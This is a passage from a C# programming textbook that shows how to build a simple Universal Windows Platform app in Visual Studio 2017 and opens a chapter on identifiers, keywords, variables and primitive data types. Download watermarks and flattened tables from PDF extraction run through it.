dialog box will appear confirming that this is what you want to do, as it
bypasses some of the security features of WindowsClick Yes. Windows
will download and install the Developer Mode package, which provides
additional features for debugging UWP applications:
Download from finelybook [email protected]
64
9. Note External apps that are not downloaded from the Windows Store
could potentially expose personal data and pose other security risks, but
it is necessary to enable Developer Mode if you are building and testing
your own custom applications.Return to Visual Studio. After the app has
been created, look in the Solution Explorer pane.
Don’t be fooled by the name of the application template. Although it is
called Blank App, this template actually provides a number of files and
contains some code. For example, if you expand the MainPage.xaml
folder, you will find a C# file named MainPage.xaml.cs. This file is
where you add the initial code for the application.
10. In Solution Explorer, double-click MainPage.xaml.
This file contains the layout of the UI. The Design View window shows
two representations of this file:
Download from finelybook [email protected]
65
Note XAML stands for eXtensible Application Markup Language,
which is the language that Universal Windows Platform
applications use to define the layout for the GUI of an application.
You will learn more about XAML as you progress through the
exercises in this book.
At the top is a graphical view depicting the screen of, by default, a
Surface Book. The lower pane contains a description of the contents of
this screen using XAML. XAML is an XML-like language used by
UWP applications to define the layout of a form and its contents. If you
have knowledge of XML, XAML should look familiar.
Download from finelybook [email protected]
66
In the next exercise, you will use the Design View window to lay out the
UI for the application, and you will examine the XAML code that this
layout generates.
Tip Close the Output and Error List windows to provide more
space for displaying the Design View window.
Note Before going further, it is worth explaining some
terminology. In traditional Windows applications, the UI consists
of one or more windows, but in a Universal Windows Platform
app, the corresponding items are referred to as pages. For the sake
of clarity, I will simply refer to both items by using the blanket
term form. However, I will continue to use the word window to
refer to items in the Visual Studio 2017 IDE, such as the Design
View window.
In the following exercises, you will use the Design View window to add
three controls to the form displayed by your application. You will also
examine some of the C# code automatically generated by Visual Studio 2017
to implement these controls.
Create the user interface
1. Click the Toolbox tab that appears in the margin to the left of the form
in the Design View window.
The Toolbox appears and displays the various components and controls
that you can place on a form. By default, the General section of the
toolbox is selected, which doesn’t contain any controls (yet).
2. Expand the Common XAML Controls section.
Download from finelybook [email protected]
67
This section displays a list of controls that most graphical applications
use.
TipThe All XAML Controls section displays a more extensive list
of controls.
3. In the Common XAML Controls section, click TextBlock, and then drag
the TextBlock control onto the form displayed in the Design View
window.
Tip Be sure that you select the TextBlock control and not the
TextBox control. If you accidentally place the wrong control on a
form, you can easily remove it by clicking the item on the form
and then pressing Delete.
A TextBlock control is added to the form (you will move it to its correct
location in a moment), and the Toolbox disappears from view.
Tip If you want the Toolbox to remain visible but not hide any part
of the form, at the right end of the Toolbox title bar, click the Auto
Hide button (it looks like a pin). The Toolbox is docked on the left
side of the Visual Studio 2017 window, and the Design View
window shrinks to accommodate it. (You might lose a lot of space
if you have a low-resolution screen.) Clicking the Auto Hide
button once more causes the Toolbox to disappear again.
Download from finelybook [email protected]
68
4. The TextBlock control on the form is probably not exactly where you
want it. You can click and drag the controls you have added to a form to
reposition them. Using this technique, move the TextBlock control so
that it is positioned toward the upper-left corner of the form. (The exact
placement is not critical for this application.) Notice that you might need
to click away from the control and then click it again before you can
move it in the Design View window.
The XAML description of the form in the lower pane now includes the
TextBlock control, together with properties such as its location on the
form, governed by the Margin property, the default text displayed by
this control in the Text property, the alignment of text displayed by this
control as specified by the HorizontalAlignment and VerticalAlignment
properties, and whether text should wrap if it exceeds the width of the
control.
Your XAML code for the TextBlock will look similar to this (your
values for the Margin property might be slightly different, depending on
where you positioned the TextBlock control on the form):
Click here to view code image
<TextBlock HorizontalAlignment="Left" Margin="150,180,0,0"
Text="TextBlock"
TextWrapping="Wrap" VerticalAlignment="Top"/>
The XAML pane and the Design View window have a two-way
relationship with each other. You can edit the values in the XAML pane,
and the changes will be reflected in the Design View window. For
example, you can change the location of the TextBlock control by
modifying the values in the Margin property.
5. On the View menu, click Properties Window (it is the last item in the
menu).
If it was not already displayed, the Properties window appears at the
lower right of the screen, under the Solution Explorer pane. You can
specify the properties of controls by using the XAML pane under the
Design View window, but the Properties window provides a more
convenient way for you to modify the properties for items on a form, as
Download from finelybook [email protected]
69
well as other items in a project.
The Properties window is context sensitive in that it displays the
properties for the currently selected item. If you click the form displayed
in the Design View window (outside the TextBlock control), you can see
that the Properties window displays the properties for a Grid element. If
you look at the XAML pane, you should see that the TextBlock control
is contained within a Grid element. All forms contain a Grid element
that controls the layout of displayed items; for example, you can define
tabular layouts by adding rows and columns to the Grid.
6. In the Design View window, click the TextBlock control. The Properties
window displays the properties for the TextBlock control again.
7. In the Properties window, expand the Text property of the TextBlock
control. Change the FontSize property to 20 pt and then press Enter.
This property is located next to the drop-down list box containing the
name of the font, which will show Segoe UI:
Note The suffix pt indicates that the font size is measured in
points, where 1 point is equal to 1/72 of an inch.
Download from finelybook [email protected]
70
8. In the XAML pane below the Design View window, examine the text
that defines the TextBlock control. If you scroll to the end of the line,
you should see the text FontSize=”26.667”. This is an approximate
conversion of the font size from points to pixels (3 points is assumed to
be roughly 4 pixels, although a precise conversion would depend on
your screen size and resolution). Any changes that you make using the
Properties window are automatically reflected in the XAML definitions,
and vice versa.
Type over the value of the FontSize attribute in the XAML pane and
change it to 24. The font size of the text for the TextBlock control in the
Design View window and the Properties window changes.
9. In the Properties window, examine the other properties of the TextBlock
control. Feel free to experiment by changing them to see their effects.
Notice that as you change the values of properties, these properties are
added to the definition of the TextBlock control in the XAML pane.
Each control that you add to a form has a default set of property values,
and these values are not displayed in the XAML pane unless you change
them.
10. Change the value of the Text property of the TextBlock control from
TextBlock to Please enter your name. You can do this either by editing
the Text element in the XAML pane or by changing the value in the
Properties window (this property is located in the Common section in
the Properties window).
Notice that the text displayed in the TextBlock control in the Design
View window changes.
11. Click the form in the Design View window, and then display the
Toolbox again.
12. In the Toolbox, click and drag the TextBox control onto the form. Move
the TextBox control so that it is directly below the TextBlock control.
Download from finelybook [email protected]
71
Tip When you drag a control on a form, alignment indicators
appear automatically. These give you a quick visual cue to ensure
that controls are lined up neatly. You can also manually edit the
Margin property in the XAML pane to set the left-hand margin to
the same value of that for the TextBlock control.
13. In the Design View window, place the mouse over the right edge of the
TextBox control. The mouse pointer should change to a double-headed
arrow, indicating that you can resize the control. Drag the right edge of
the TextBox control until it is aligned with the right edge of the
TextBlock control above.
14. While the TextBox control is selected, at the top of the Properties
window, change the value of the Name property from textBox to
userName, as illustrated here:
Download from finelybook [email protected]
72
Note You will learn more about naming conventions for controls
and variables in Chapter 2, “Working with variables, operators,
and expressions.”
15. Display the Toolbox again, and then click and drag a Button control onto
the form. Place the Button control to the right of the TextBox control on
the form so that the bottom of the button is aligned horizontally with the
bottom of the text box.
16. Using the Properties window, change the Name property of the Button
control to OK and change the Content property (in the Common section)
from Button to OK, and then press Enter. Verify that the caption of the
Button control on the form changes to display the text OK.
The form should now look similar to the following figure:
Download from finelybook [email protected]
73
Note The drop-down menu in the upper-left corner of the Design
View window enables you to view how your form will render on
different screen sizes and resolutions. In this example, the default
view of a 13.5-inch Surface Book with a 3000 x 2000 resolution is
selected. To the right of the drop-down menu, two buttons enable
you to switch between portrait view and landscape view. The
projects used in subsequent chapters will use a 13.3-inch Desktop
view as the design surface, but you can keep the Surface Book
form factor for this exercise.
17. On the Build menu, click Build Solution, and then verify that the project
builds successfully.
18. Ensure that the Debug Target drop-down list is set to Local Machine as
shown below. (It might default to Device and attempt to connect to a
Windows phone device, and the build will probably fail). Then, on the
Debug menu, click Start Debugging.
The application should run and display your form. The form looks like
this:
Download from finelybook [email protected]
74
Note When you run a Universal Windows Platform app in debug
mode, a debug toolbar appears near the top of the form. You can
use this toolbar to track how the user is navigating through the
form and monitor how the contents of the controls on the form
change. You can ignore this menu for now; click the double bar at
the bottom of the toolbar to minimize it.
In the text box, you can overtype the existing text with your name, and
then click OK, but nothing happens yet. You need to add some code to
indicate what should happen when the user clicks the OK button, which
is what you will do next.
19. Return to Visual Studio 2017. On the Debug menu, click Stop
Download from finelybook [email protected]
75
Debugging.
Note You can also click the Close button (the X in the upper-right
corner of the form) to close the form, stop debugging, and return to
Visual Studio.
You have managed to create a graphical application without writing a
single line of C# code. It does not do much yet (you will have to write some
code soon), but Visual Studio 2017 actually generates a lot of code for you
that handles routine tasks that all graphical applications must perform, such
as starting up and displaying a window. Before adding your own code to the
application, it helps to have an understanding of what Visual Studio has
produced for you. The following section describes these automatically
generated artifacts.
Examining the Universal Windows Platform app
In Solution Explorer, expand the MainPage.xaml node. The file
MainPage.xaml.cs appears; double-click this file. The following code for the
form is displayed in the Code and Text Editor window:
Click here to view code image
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices.WindowsRuntime;
using Windows.Foundation;
using Windows.Foundation.Collections;
using Windows.UI.Xaml;
using Windows.UI.Xaml.Controls;
using Windows.UI.Xaml.Controls.Primitives;
using Windows.UI.Xaml.Data;
using Windows.UI.Xaml.Input;
using Windows.UI.Xaml.Media;
using Windows.UI.Xaml.Navigation;
// The Blank Page item template is documented at
Download from finelybook [email protected]
76
http://go.microsoft.com/fwlink/?LinkId=402352&clcid=0x409
namespace Hello
{
/// <summary>
/// An empty page that can be used on its own or navigated to
within a Frame.
/// </summary>
public sealed partial class MainPage : Page
{
public MainPage()
{
this.InitializeComponent();
}
}
}
In addition to a good number of using directives bringing into scope some
namespaces that most UWP apps use, the file contains the definition of a
class called MainPage but not much else. There is a little bit of code for the
MainPage class known as a constructor that calls a method named
InitializeComponent. A constructor is a special method with the same name
as the class. It runs when an instance of the class is created and can contain
code to initialize the instance. You will learn about constructors in Chapter 7.
The class actually contains a lot more code than the few lines shown in the
MainPage.xaml.cs file, but much of it is generated automatically based on the
XAML description of the form and is hidden from you. This hidden code
performs operations such as creating and displaying the form and creating
and positioning the various controls on the form.
Tip You can also display the C# code file for a page in a UWP app by
clicking Code on the View menu when the Design View window is
displayed.
At this point, you might be wondering where the Main method is and how
the form gets displayed when the application runs. Remember that in a
Download from finelybook [email protected]
77
console application Main defines the point at which the program starts. A
graphical application is slightly different.
In Solution Explorer, you should notice another source file called
App.xaml. If you expand the node for this file, you will see another file called
App.xaml.cs. In a UWP app, the App.xaml file provides the entry point at
which the application starts running. If you double-click App.xaml.cs in
Solution Explorer, you should see some code that looks similar to this:
Click here to view code image
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices.WindowsRuntime;
using Windows.ApplicationModel;
using Windows.ApplicationModel.Activation;
using Windows.Foundation;
using Windows.Foundation.Collections;
using Windows.UI.Xaml;
using Windows.UI.Xaml.Controls;
using Windows.UI.Xaml.Controls.Primitives;
using Windows.UI.Xaml.Data;
using Windows.UI.Xaml.Input;
using Windows.UI.Xaml.Media;
using Windows.UI.Xaml.Navigation;
namespace Hello
{
/// <summary>
/// Provides application-specific behavior to supplement the
default Application class.
/// </summary>
sealed partial class App : Application
{
/// <summary>
/// Initializes the singleton application object. This is
the first line of authored code
/// executed, and as such is the logical equivalent of main()
or WinMain().
/// </summary>
public App()
{
this.InitializeComponent();
this.Suspending += OnSuspending;
}
Download from finelybook [email protected]
78
/// <summary>
/// Invoked when the application is launched normally by the
end user. Other entry points
/// will be used such as when the application is launched to
open a specific file.
/// </summary>
/// <param name="e">Details about the launch request and
process.</param>
protected override void OnLaunched(LaunchActivatedEventArgs
e)
{
Frame rootFrame = Window.Current.Content as Frame;
// Do not repeat app initialization when the Window
already has content,
// just ensure that the window is active
if (rootFrame == null)
{
// Create a Frame to act as the navigation context
and navigate to the first page
rootFrame = new Frame();
rootFrame.NavigationFailed += OnNavigationFailed;
if (e.PreviousExecutionState ==
ApplicationExecutionState.Terminated)
{
//TODO: Load state from previously suspended
application
}
// Place the frame in the current Window
Window.Current.Content = rootFrame;
}
if (e.PrelaunchActivated == false)
{
if (rootFrame.Content == null)
{
// When the navigation stack isn't restored
navigate to the first page,
// configuring the new page by passing required
information as a navigation
// parameter
rootFrame.Navigate(typeof(MainPage),
Download from finelybook [email protected]
79
e.Arguments);
}
// Ensure the current window is active
Window.Current.Activate();
}
}
/// <summary>
/// Invoked when Navigation to a certain page fails
/// </summary>
/// <param name="sender">The Frame which failed
navigation</param>
/// <param name="e">Details about the navigation
failure</param>
void OnNavigationFailed(object sender,
NavigationFailedEventArgs e)
{
throw new Exception("Failed to load Page " +
e.SourcePageType.FullName);
}
/// <summary>
/// Invoked when application execution is being
suspended. Application state is saved
/// without knowing whether the application will be
terminated or resumed with the contents
/// of memory still intact.
/// </summary>
/// <param name="sender">The source of the suspend request.
</param>
/// <param name="e">Details about the suspend request.
</param>
private void OnSuspending(object sender, SuspendingEventArgs
e)
{
var deferral = e.SuspendingOperation.GetDeferral();
//TODO: Save application state and stop any background
activity
deferral.Complete();
}
}
}
Much of this code consists of comments (the lines beginning “///”) and
other statements that you don’t need to understand just yet, but the key
elements are located in the OnLaunched method, highlighted in bold. This
method runs when the application starts and the code in this method causes
the application to create a new Frame object, display the MainPage form in
Download from finelybook [email protected]
80
this frame, and then activate it. It is not necessary at this stage to fully
comprehend how this code works or the syntax of any of these statements,
but it’s helpful that you simply appreciate that this is how the application
displays the form when it starts running.
Adding code to the graphical application
Now that you know a little bit about the structure of a graphical application,
the time has come to write some code to make your application actually do
something.
Write the code for the OK button
1. In the Design View window, open the MainPage.xaml file (double-click
MainPage.xaml in Solution Explorer).
2. While still in the Design View window, click the OK button on the form
to select it.
3. In the Properties window, click the Event Handlers button for the
selected element.
This button displays an icon that looks like a bolt of lightning, as
demonstrated here:
Download from finelybook [email protected]
81
The Properties window displays a list of event names for the Button
control. An event indicates a significant action that usually requires a
response, and you can write your own code to perform this response.
4. In the box adjacent to the Click event, type okClick, and then press
Enter.
The MainPage.xaml.cs file appears in the Code and Text Editor window,
and a new method named okClick is added to the MainPage class. The
method looks like this:
Click here to view code image
private void okClick(object sender, RoutedEventArgs e)
{
}
Do not worry too much about the syntax of this code just yet—you will
learn all about methods in Chapter 3.
5. Add the following using directive shown in bold to the list at the top of
the file (the ellipsis character […] indicates statements that have been
omitted for brevity):
Click here to view code image
using System;
...
using Windows.UI.Xaml.Navigation;
using Windows.UI.Popups;
6. Add the following code shown in bold to the okClick method:
Click here to view code image
private void okClick(object sender, RoutedEventArgs e)
{
MessageDialog msg = new MessageDialog("Hello " +
userName.Text);
msg.ShowAsync();
}
This code will run when the user clicks the OK button. Again, do not
worry too much about the syntax, just be sure that you copy the code
exactly as shown; you will find out what these statements mean in the
next few chapters. The key things to understand are that the first
Download from finelybook [email protected]
82
statement creates a MessageDialog object with the message “Hello
<YourName>”, where <YourName> is the name that you type into the
TextBox on the form. The second statement displays the MessageDialog,
causing it to appear on the screen. The MessageDialog class is defined
in the Windows.UI.Popups namespace, which is why you added it in
step 5.
Note You might notice that Visual Studio 2017 adds a wavy green
line under the last line of code you typed. If you hover over this
line of code, Visual Studio displays a warning that states “Because
this call is not awaited, execution of the current method continues
before the call is completed. Consider applying the ‘await’
operator to the result of the call.” Essentially, this warning means
that you are not taking full advantage of the asynchronous
functionality that the .NET Framework provides. You can safely
ignore this warning.
7. Click the MainPage.xaml tab above the Code and Text Editor window to
display the form in the Design View window again.
8. In the lower pane displaying the XAML description of the form,
examine the Button element, but be careful not to change anything.
Notice that it now contains an attribute named Click that refers to the
okClick method.
Click here to view code image
<Button x:Name="ok" ... Click="okClick" />
9. On the Debug menu, click Start Debugging.
10. When the form appears, in the text box, type your name over the
existing text, and then click OK.
A message dialog box appears displaying the following greeting:
Download from finelybook [email protected]
83
11. Click Close in the message box.
12. Return to Visual Studio 2017 and then, on the Debug menu, click Stop
Debugging.
Other types of graphical applications
Apart from Universal Windows apps, Visual Studio 2017 also lets you
create other types of graphical applications. These applications are
intended for specific environments and do not include the adaptability
to enable them to run across multiple platforms unchanged.
The other types of graphical applications available include:
WPF App. You can find this template in the list of Windows
Classic Desktop templates in Visual Studio 2017. WPF stands for
“Windows Presentation Foundation.” WPF is targeted at
Download from finelybook [email protected]
84
applications that run on the Windows desktop, rather than
applications that can adapt to a range of different devices and
form factors. It provides an extremely powerful framework based
on vector graphics that enable the user interface to scale smoothly
across different screen resolutions. Many of the key features of
WPF are available in UWP applications, although WPF provides
additional functionality that is only appropriate for applications
running on powerful desktop machines.
Windows Forms App. This is an older graphical library that dates
back to the origins of the .NET Framework. You can also find
this template in the Class Desktop template list in Visual Studio
2017. As its name implies, the Windows Forms library is
intended for building more classical forms-based applications
using the Graphics Device Interface (GDI) libraries provided with
Windows at that time. While this framework is quick to use, it
provides neither the functionality and scalability of WPF nor the
portability of UWP.
If you are building graphical applications, unless you have good
reasons not to do so, I would suggest that you opt for the UWP
template.
Summary
In this chapter, you saw how to use Visual Studio 2017 to create, build, and
run applications. You created a console application that displays its output in
a console window, and you created a Universal Windows Platform
application with a simple GUI.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 2.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes to save the project.
Download from finelybook [email protected]
85
Quick reference
To
Do this
Create a
new
console
application
using
Visual
Studio
2017
On the File menu, point to New, and then click Project to open
the New Project dialog box. In the left pane, expand Installed,
and then click Visual C#. In the middle pane, click Console
Application. In the Location box, specify a directory for the
project files. Type a name for the project, and then click OK.
Create a
new
Universal
Windows
app using
Visual
Studio
2017
On the File menu, point to New, and then click Project to open
the New Project dialog box. In the left pane, expand Installed,
expand Visual C#, expand Windows, and then click Universal.
In the middle pane, click Blank App (Universal Windows). In
the Location box, specify a directory for the project files. Type
a name for the project, and then click OK.
Build the
application
On the Build menu, click Build Solution.
Run the
application
in debug
mode
On the Debug menu, click Start Debugging.
Run the
application
without
debugging
On the Debug menu, click Start Without Debugging.
Download from finelybook [email protected]
86
CHAPTER 2
Working with variables, operators,
and expressions
After completing this chapter, you will be able to:
Understand statements, identifiers, and keywords.
Use variables to store information.
Work with primitive data types.
Use arithmetic operators such as the plus sign (+) and the minus sign
(–).
Increment and decrement variables.
Chapter 1, “Welcome to C#,” presents how to use the Microsoft Visual
Studio 2017 programming environment to build and run a console program
and a graphical application. This chapter introduces you to the elements of
Microsoft Visual C# syntax and semantics, including statements, keywords,
and identifiers. You’ll study the primitive types that are built into the C#
language and the characteristics of the values that each type holds. You’ll
also see how to declare and use local variables (variables that exist only in a
method or another small section of code), learn about the arithmetic operators
that C# provides, find out how to use operators to manipulate values, and
learn how to control expressions containing two or more operators.
Understanding statements
Download from finelybook [email protected]
87
A statement is a command that performs an action, such as calculating a
value and storing the result or displaying a message to a user. You combine
statements to create methods. You’ll learn more about methods in Chapter 3,
“Writing methods and applying scope,” but for now, think of a method as a
named sequence of statements. Main, which was introduced in the previous
chapter, is an example of a method.
Statements in C# follow a well-defined set of rules describing their format
and construction. These rules are collectively known as syntax. (In contrast,
the specification of what statements do is collectively known as semantics.)
One of the simplest and most important C# syntax rules states that you must
terminate all statements with a semicolon. For example, Chapter 1
demonstrates that without the terminating semicolon, the following statement
won’t compile:
Click here to view code image
Console.WriteLine("Hello, World!");
Tip C# is a “free format” language, which means that white space, such
as a space character or a new line, is not significant except as a
separator. In other words, you are free to lay out your statements in any
style you choose. However, you should adopt a simple, consistent
layout style to make your programs easier to read and understand.
The trick to programming well in any language is to learn the syntax and
semantics of the language and then use the language in a natural and
idiomatic way. This approach makes your programs easier to maintain. As
you progress through this book, you’ll see examples of the most important C#
statements.
Using identifiers
Identifiers are the names that you use to identify the elements in your
Download from finelybook [email protected]
88
programs, such as namespaces, classes, methods, and variables. (You will
learn about variables shortly.) In C#, you must adhere to the following syntax
rules when choosing identifiers:
You can use only letters (uppercase and lowercase), digits, and
underscore characters.
An identifier must start with a letter or an underscore.
For example, result, _score, footballTeam, and plan9 are all valid
identifiers, whereas result%, footballTeam$, and 9plan are not.
Important C# is a case-sensitive language: footballTeam and
FootballTeam are two different identifiers.
Identifying keywords
The C# language reserves 77 identifiers for its own use, and you cannot reuse
these identifiers for your own purposes. These identifiers are called
keywords, and each has a particular meaning. Examples of keywords are
class, namespace, and using. You’ll learn the meaning of most of the C#
keywords as you proceed through this book. The following is the list of
keywords:
abstract
do
in
protected
true
as
double
int
public
try
base
else
interface
readonly
typeof
bool
enum
internal
ref
uint
break
event
is
return
ulong
byte
explicit
lock
sbyte
unchecked
case
extern
long
sealed
unsafe
catch
false
namespace
short
ushort
char
finally
new
sizeof
using
Download from finelybook [email protected]
89
checked
fixed
null
stackalloc
virtual
class
float
object
static
void
const
for
operator
string
volatile
continue
foreach
out
struct
while
decimal
goto
override
switch
default
if
params
this
delegate
implicit
private
throw
Tip In the Visual Studio 2017 Code and Text Editor window, keywords
are colored blue when you type them.
C# also uses the following identifiers. These identifiers are not reserved
by C#, which means that you can use these names as identifiers for your own
methods, variables, and classes, but you should avoid doing so if at all
possible.
add
global
select
alias
group
set
ascending
into
value
async
join
var
await
let
when
descending
nameof
where
dynamic
orderby
yield
from
partial
get
remove
Using variables
A variable is a storage location that holds a value. You can think of a
Download from finelybook [email protected]
90
variable as a box in the computer’s memory that holds temporary
information. You must give each variable in a program an unambiguous
name that uniquely identifies it in the context in which it is used. You use a
variable’s name to refer to the value it holds. For example, if you want to
store the value of the cost of an item in a store, you might create a variable
simply called cost and store the item’s cost in this variable. Later on, if you
refer to the cost variable, the value retrieved will be the item’s cost that you
stored there earlier.
Naming variables
You should adopt a naming convention for variables that helps you avoid
confusion concerning the variables you have defined. This is especially
important if you are part of a project team with several developers working
on different parts of an application; a consistent naming convention helps to
avoid confusion and can reduce the scope for bugs. The following list
contains some general recommendations:
Don’t start an identifier with an underscore. Although this is legal in
C#, it can limit the interoperability of your code with applications built
by using other languages, such as Microsoft Visual Basic.
Don’t create identifiers that differ only by case. For example, do not
create one variable named myVariable and another named MyVariable
for use at the same time because it is too easy to confuse one with the
other. Also, defining identifiers that differ only by case can limit the
ability to reuse classes in applications developed with other languages
that are not case-sensitive, such as Visual Basic.
Start the name with a lowercase letter.
In a multi-word identifier, start the second and each subsequent word
with an uppercase letter. (This is called camelCase notation.)
Don’t use Hungarian notation. (If you are a Microsoft Visual C++
developer, you are probably familiar with Hungarian notation. If you
don’t know what Hungarian notation is, don’t worry about it!)
For example, score, footballTeam, _score, and FootballTeam are all valid
variable names, but only the first two are recommended.
Download from finelybook [email protected]
91
Declaring variables
Variables hold values. C# has many different types of values that it can store
and process: integers, floating-point numbers, and strings of characters, to
name three. When you declare a variable, you must specify the type of data it
will hold.
You declare the type and name of a variable in a declaration statement.
For example, the statement that follows declares that the variable named age
holds int (integer) values. As always, you must terminate the statement with a
semicolon.
int age;
The variable type int is the name of one of the primitive C# types, integer,
which is a whole number. (You’ll learn about several primitive data types
later in this chapter.)
Note If you are a Visual Basic programmer, you should note that C#
does not allow implicit variable declarations. You must explicitly
declare all variables before you use them.
After you’ve declared your variable, you can assign it a value. The
statement that follows assigns age the value 42. Again, note that the
semicolon is required.
age = 42;
The equal sign (=) is the assignment operator, which assigns the value on
its right to the variable on its left. After this assignment, you can use the age
variable in your code to refer to the value it holds. The next statement writes
the value of the age variable (42) to the console:
Console.WriteLine(age);
Download from finelybook [email protected]
92
Tip If you leave the mouse pointer over a variable in the Visual Studio
2017 Code and Text Editor window, a ScreenTip indicates the type of
the variable.
Specifying numeric values
It’s important to understand the impact of variable type on the data that a
variable can hold, and how this data is handled. For example, it should be
obvious that a numeric variable cannot hold a string value such as “Hello.”
However, in some cases, the type of a value being assigned to a variable is
not always so clear-cut.
Take the literal value 42 as an example. It is numeric. Furthermore, it is an
integer, and you can assign it directly to an integer variable. But what
happens if you try and assign this value to a non-integer type, such as a
floating-point variable? The answer is that C# will silently convert the integer
value to a floating-point value. This is relatively harmless but is not
necessarily good practice. You should really specify that you intended to treat
the literal value 42 as a floating-point number and haven’t mistakenly
assigned it to the wrong type of variable. You can do this by appending the
“F” suffix to the numeric literal, like this:
Click here to view code image
float myVar; // declare a floating-point variable
myVar = 42F; // assign a floating-point value to the variable
How about the value 0.42; what is the type of this expression? The answer
is that, like all numeric literals that include a decimal point, it is actually a
double-precision floating-point number, referred to as a double for short. You
will see in the next section that a double has a bigger range and greater
precision than a float. It you want to assign the value 0.42 to a float, you
should apply the “F” suffix (the C# compiler actually insists on this):
myVar = 0.42F;
Download from finelybook [email protected]
93
C# has other numeric types; long integers, which have a bigger range than
integers, and decimals, which hold exact decimal values (floats and doubles
can be subject to rounding and other approximations when they are involved
in calculations). You should use the “L” suffix to assign a numeric literal
value to a long, and the “M” suffix to assign a numeric literal value to a
decimal.
This might seem to be a trivial point, but it is surprising how many subtle
errors can creep into a program by accidentally assigning a value of the
wrong type to a variable. Consider what might happen if you attempt to
perform a calculation that involves a large number of significant decimal
places and store the results in a float. In the worst case, this could lead to
truncating data, causing errors in calculations, and ensuring that your
guidance application causes your space probe to completely miss Mars and to
head off to the deeper depths of the solar system instead!
Working with primitive data types
The numeric types of C#, together with other common types for holding
strings, characters, and Boolean values, are collectively known as the
primitive data types. The following table lists the most commonly used
primitive data types and the range of values that you can store in each.
Data
type
Description
Size
(bits)
Range
Sample usage
int
Whole numbers
(integers)
32
–231 through
231 – 1
int count;
count = 42;
long
Whole numbers
(bigger range)
64
–263 through
263 – 1
long wait;
wait = 42L;
float
Floating-point
numbers
32
–3.4 × 10–38
through 3.4
× 1038
float away;
away =
0.42F;
double
Double-precision
64
±5.0 ×
double
Download from finelybook [email protected]
94
(more accurate)
floating-point
numbers
10–324
through
±1.7 × 10308
trouble;
trouble =
0.42;
decimal Monetary values
128
28
significant
figures
decimal
coin; coin
= 0.42M;
string
Sequence of
characters
16 bits
per
character
Not
applicable
string vest
vest =
"forty
two";
char
Single character
16
A single
character
char grill;
grill =
'x';
bool
Boolean
8
True or false bool teeth;
teeth =
false;
Unassigned local variables
When you declare a variable, it contains a random value until you assign a
value to it. This behavior was a rich source of bugs in C and C++ programs
that created a variable and accidentally used it as a source of information
before giving it a value. C# does not allow you to use an unassigned variable.
You must assign a value to a variable before you can use it; otherwise, your
program will not compile. This requirement is called the definite assignment
rule. For example, the following statements generate the compile-time error
message, “Use of unassigned local variable ‘age’” because the
Console.WriteLine statement attempts to display the value of an uninitialized
variable:
Click here to view code image
int age; Console.WriteLine(age); // compile-time error
Download from finelybook [email protected]
95
Displaying primitive data type values
In the following exercise, you use a C# program named PrimitiveDataTypes
to demonstrate how several primitive data types work.
Display primitive data type values
1. Start Visual Studio 2017 if it is not already running.
2. On the File menu, point to Open, and then click Project/Solution.
The Open Project dialog box appears.
3. Move to the \Microsoft Press\VCSBS\Chapter 2\PrimitiveDataTypes
folder in your Documents folder.
4. Select the PrimitiveDataTypes solution file, and then click Open.
The solution loads, and Solution Explorer displays the
PrimitiveDataTypes project.
Note Solution file names have the .sln suffix, such as
PrimitiveDataTypes.sln. A solution can contain one or more
projects. Visual C# project files have the .csproj suffix. If you open
a project rather than a solution, Visual Studio 2017 automatically
creates a new solution file for it. This situation can be confusing if
you are not aware of this feature because it can result in you
accidentally generating multiple solutions for the same project.
5. On the Debug menu, click Start Debugging.
You might see some warnings in Visual Studio. You can safely ignore
them. (You will correct them in the next exercise.)
Download from finelybook [email protected]
96
6. In the Choose A Data Type list, click string.
The text “forty-two” appears in the Sample Value box.
7. Again, in the Choose A Data Type list, click the int type.
The text “to do” appears in the Sample Value box, indicating that the
statements to display an int value still need to be written.
8. Click each data type in the list. Confirm that the code for the double and
bool types is not yet implemented; the application displays the results as
“to do.”
9. Return to Visual Studio 2017 and then, on the Debug menu, click Stop
Debugging.
You can also close the window to stop debugging.
Use primitive data types in code
Download from finelybook [email protected]
97
1. In Solution Explorer, expand the PrimitiveDataTypes project (if it is not
already expanded), and then double-click MainPage.xaml.
The the application form appears in the Design View window.
Hint If your screen is not big enough to display the entire form,
you can zoom in and out in the Design View window by using
Ctrl+Alt+= and Ctrl+Alt+– or by selecting the size from the Zoom
drop-down list in the lower-left corner of the Design View
window.
2. In the XAML pane, scroll down to locate the markup for the ListBox
control. This control displays the list of data types in the left part of the
form, and it looks like this (some of the properties have been removed
from this text):
Click here to view code image
<ListBox x:Name="type" ...
SelectionChanged="typeSelectionChanged">
<ListBoxItem>int</ListBoxItem>
<ListBoxItem>long</ListBoxItem>
<ListBoxItem>float</ListBoxItem>
<ListBoxItem>double</ListBoxItem>
<ListBoxItem>decimal</ListBoxItem>
<ListBoxItem>string</ListBoxItem>
<ListBoxItem>char</ListBoxItem>
<ListBoxItem>bool</ListBoxItem>
</ListBox>
The ListBox control displays each data type as a separate ListBoxItem.
When the application is running, if a user clicks an item in the list, the
SelectionChanged event occurs (this is a little bit like the Click event
that occurs when the user clicks a button, which is demonstrated in
Chapter 1). You can see that in this case, the ListBox invokes the
typeSelectionChanged method. This method is defined in the
MainPage.xaml.cs file.
3. On the View menu, click Code.
Download from finelybook [email protected]
98
The Code and Text Editor window opens, displaying the
MainPage.xaml.cs file.
Note Remember that you can also use Solution Explorer to access
the code. Click the arrow to the left of the MainPage.xaml file to
expand the node, and then double-click MainPage.xaml.cs.
4. In the Code and Text Editor window, find the typeSelectionChanged
method.
Tip To locate an item in your project, on the Edit menu, point to
Find And Replace, and then click Quick Find. A menu opens in the
upper-right corner of the Code and Text Editor window. In the text
box on this shortcut menu, type the name of the item you’re
looking for, and then click Find Next (the right-arrow symbol next
to the text box):
Download from finelybook [email protected]
99
By default, the search is not case-sensitive. If you want to perform a
case-sensitive search, click the Match Case button (Aa) below the text
for which you are searching.
Instead of using the Edit menu, you can also press Ctrl+F to display the
Quick Find dialog box. Similarly, you can press Ctrl+H to display the
Quick Replace dialog box.
As an alternative to using the Quick Find functionality, you can also
locate the methods in a class by using the class members drop-down list
box above the Code and Text Editor window, on the right.
Download from finelybook [email protected]
100
The class members drop-down list box displays all the methods in the
class, together with the variables and other items that the class contains.
(You will learn more about these items in later chapters.) In the drop-
down list, click the typeSelectionChanged method, and the cursor will
move directly to the typeSelectionChanged method in the class.
If you have programmed using another language, you can probably
